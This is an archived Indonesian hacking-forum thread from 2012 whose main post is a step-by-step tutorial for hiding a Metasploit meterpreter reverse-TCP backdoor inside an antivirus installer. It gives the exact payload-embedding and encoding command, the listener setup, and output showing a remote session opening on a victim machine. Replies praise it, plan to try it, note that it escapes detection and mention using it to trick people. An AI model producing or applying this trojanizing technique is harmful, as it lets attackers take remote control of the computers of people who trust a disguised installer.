+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html)
+--- Forum: Exploitation (https://www.indonesianbacktrack.or.id/forum/forum-43.html)
+---- Forum: Metasploit (https://www.indonesianbacktrack.or.id/forum/forum-122.html)
+---- Thread: Share Menyamarkan virus pada Antivirus Installer (/thread-4094.html)
Menyamarkan virus pada Antivirus Installer - zee eichel - 11-30-2012
Tutorial kali ini adalah tentang bagaimana kita melakukan penyamaran backdoor yang kita sisipi di dalam sebuah file .exe windows dengan metasploit. Langsung sja gk perlu basa basi ..
Untuk percobaan kli ini saya pakai sistem operasi dracos … hmm untuk peretas-peretas OS lainnya tinggal menyesuaikan saja.
pertama-tama mari kita buat backdoor dengan menyisipkannya pada sebuah file exe .. kali ni saya pilih installer antivirus smadav
download disini guys
http://smadav.web.id/download/
klo sudah saatnya msfpayload salah satu andalan metasploit dalam sisi maintaining access memulai aksinya
Code:
[email protected]:~# cd /opt/metasploit-4.4.0/msf3Code:
[email protected]racos:/opt/metasploit-4.4.0/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.4 LPORT=4444 R | ./msfencode -e x86/shikata_ga_nai -c 10 -t exe -x /root/Downloads/smadav91.exe -o /var/www/smadav91.exeQuote:[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)[*]
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
[*] x86/shikata_ga_nai succeeded with size 452 (iteration=6)
[*] x86/shikata_ga_nai succeeded with size 479 (iteration=7)
[*] x86/shikata_ga_nai succeeded with size 506 (iteration=8)
[*] x86/shikata_ga_nai succeeded with size 533 (iteration=9)
[*] x86/shikata_ga_nai succeeded with size 560 (iteration=10)
dimana :
- windows/meterpreter/reverse_tcp adalah tipe payload bisa di sesuikan dengan keperluan (meterpreter/bind) ( reverse_tcp, reverse_http, reverse_https)
- LHOST ( localhost) adalah alamat IP kita
- LPORT ( localport ) adalah port lokal yang akan kita gunakan dalam menjalankan listener ( reverse )
-c Jumlah enskripsi
-t tipe backdoor
-x posisi file exe yang hendak kita injeksi
-o output hasil file yang telah di injeksi ( backdoor result ) kaborr
Jangan lupa buat listener yah …
Quote:[email protected]:~# msfconsole[*]
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 969 exploits - 511 auxiliary - 155 post
+ -- --=[ 261 payloads - 28 encoders - 8 nops
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.2.4
LHOST => 192.168.2.4
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh,
thread, process, none
LHOST 192.168.2.4 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.2.4:4444
[*]Starting the payload handler...
[*]
wew .. mari kita lihat penampakan jenis file ini pada kompi target …
![[Image: backdoor_in_exe.png]](http://zico-ekel.com/wp-content/uploads/2013/10/backdoor_in_exe.png)
hmm sekilas terlihat sama persisi .. dan ketika korban melakukan esekusi .. its work like a charm happy
Code:
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.2.4:4444
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.2.5
[*] Meterpreter session 1 opened (192.168.2.4:4444 ->
192.168.2.5:1816) at 2012-11-30 01:44:27 +0700
meterpreter >[*]
silahkan kreasikan backdoor dengan file-file exe yang lain ..
selamat berkarya..
RE: Menyamarkan virus pada Antivirus Installer - jakkidz - 11-30-2012
wiidih..
ijin praktek ya om
RE: Menyamarkan virus pada Antivirus Installer - iKONspirasi - 11-30-2012
wah berarti smadavnya ga bisa detek meterpreter ya om? surem haha
+1 dari ane
RE: Menyamarkan virus pada Antivirus Installer - stevennathaniel - 11-30-2012
itu kalau file smadav yg sudah di inject dengan payload di klik 2 kali, apakah proses instalasi smadav nya akan berjalan, atau akan muncul pesan error?
itu kalau file smadav yg sudah di inject dengan payload di klik 2 kali, apakah proses instalasi smadav nya akan berjalan, atau akan muncul pesan error?
RE: Menyamarkan virus pada Antivirus Installer - wahyuardan - 11-30-2012
makasih om ilmunya
, alternatif buat nipu pake antivirus backdoornya atau file lain
RE: Menyamarkan virus pada Antivirus Installer - xsan-lahci - 11-30-2012
wew keren om zee hahaha dirumah praktek aaah
RE: Menyamarkan virus pada Antivirus Installer - Acenk90 - 11-30-2012
nice share om..., terus berbagi ya om...,
:-bd
RE: Menyamarkan virus pada Antivirus Installer - Al - Ayyubi - 12-01-2012
surem om wkwkwkwk . .
asli nga kedetec wkwkwk . . .
RE: Menyamarkan virus pada Antivirus Installer - tyokusuma - 12-02-2012
itu harus 1 wlan lagi ya om ?? atau work offline ??
RE: Menyamarkan virus pada Antivirus Installer - ardian - 12-02-2012
ayo2,, ada yg bisa deface ga ?